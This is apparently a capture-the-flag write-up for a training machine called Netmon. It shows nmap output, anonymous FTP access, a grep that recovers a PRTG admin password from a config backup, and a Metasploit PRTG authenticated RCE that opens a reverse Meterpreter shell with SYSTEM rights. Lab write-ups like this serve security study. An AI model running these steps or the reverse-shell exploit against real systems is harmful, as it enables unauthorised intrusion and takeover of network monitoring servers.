Netmon

From RCATs
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-16 18:29 MST
Nmap scan report for 10.129.96.142
Host is up (0.093s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resyntaxhighlight was /index.htm
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2022-12-17T01:29:58
|_  start_date: 2022-12-17T01:28:50
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.05 seconds

Logged onto anonymous FTP. Check

❯ ftp anonymous@10.129.96.142
Connected to 10.129.96.142.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
# cd to Users\Public
ftp> cd Public
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  07:05AM       <DIR>          Documents
07-16-16  08:18AM       <DIR>          Downloads
07-16-16  08:18AM       <DIR>          Music
07-16-16  08:18AM       <DIR>          Pictures
12-16-22  08:29PM                   34 user.txt
07-16-16  08:18AM       <DIR>          Videos
# Grab User Flag
# look around other directories
ftp> pwd
257 "/Users/All Users/Paessler/PRTG Network Monitor" is current directory.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
12-16-22  09:11PM       <DIR>          Configuration Auto-Backups
12-16-22  08:39PM       <DIR>          Log Database
02-02-19  11:18PM       <DIR>          Logs (Debug)
02-02-19  11:18PM       <DIR>          Logs (Sensors)
02-02-19  11:18PM       <DIR>          Logs (System)
12-16-22  08:39PM       <DIR>          Logs (Web Server)
12-16-22  08:39PM       <DIR>          Monitoring Database
12-16-22  11:35PM              1186545 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
12-16-22  11:16PM              1722088 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
02-02-19  11:18PM       <DIR>          System Information Database
02-02-19  11:40PM       <DIR>          Ticket Database
02-02-19  11:18PM       <DIR>          ToD
# grab PRTG config files

grep -C2 pass PRTG\ Configuration.old.bak Winner!

            </dbcredentials>
            <dbpassword>
              <!-- User: prtgadmin -->
              PrTg@dmin2018
            </dbpassword>

Possible PRTG Version?

 <link rel="stylesheet" type="text/css" href="[/css/prtgmini.css?prtgversion=18.1.37.13946__](view-syntaxhighlight:http://10.129.96.142/css/prtgmini.css?prtgversion=18.1.37.13946__)" media="print,screen,projection" />

Tried to log into admin page. Failed. Tried to change the year to 2022.... didnt work old box Tried 2021, 2020, nothing. 2019 works!

Ran searchsploit see if there is any goodies,

❯ searchsploit PRTG
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                               |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution                                                                                                                                         | windows/webapps/46527.sh
PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS                                                                                                                                                        | windows/webapps/49156.txt
PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)                                                                                                                                     | windows_x86/dos/44500.py
PRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scripting                                                                                                                                                      | java/webapps/34108.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Booted up MSF to give it a shot. Works!

msf6 exploit(windows/http/prtg_authenticated_rce) > run  
[*] Started reverse TCP handler on 10.10.16.18:4444                                                                                                                                                                                            
[+] Successfully logged in with provided credentials                                                                                                                                                                                           
[+] Created malicious notification (objid=2018)                                                                                                                                                                                                
[+] Triggered malicious notification                                                                                                                                                                                                           
[+] Deleted malicious notification                                                                                                                                                                                                             
[*] Waiting for payload execution.. (30 sec. max)                                                                                                                                                                                              
[*] Sending stage (175686 bytes) to 10.129.96.142                                                                                                                                                                                              
[*] Meterpreter session 1 opened (10.10.16.18:4444 -> 10.129.96.142:51587) at 2022-12-16 21:30:51 -0700    
meterpreter > shell                                                                                                                                                                                                                            
Process 2488 created.                                                                                                                                                                                                                          
Channel 1 created.                                                                                                                                                                                                                             
Microsoft Windows [Version 10.0.14393]                                                                                                                                                                                                         
(c) 2016 Microsoft Corporation. All rights reserved.                                                                                                                                                                                           
C:\Windows\system32>whoami                                                                                                                                                                                                                     
whoami                                                                                                                                                                                                                                         
nt authority\system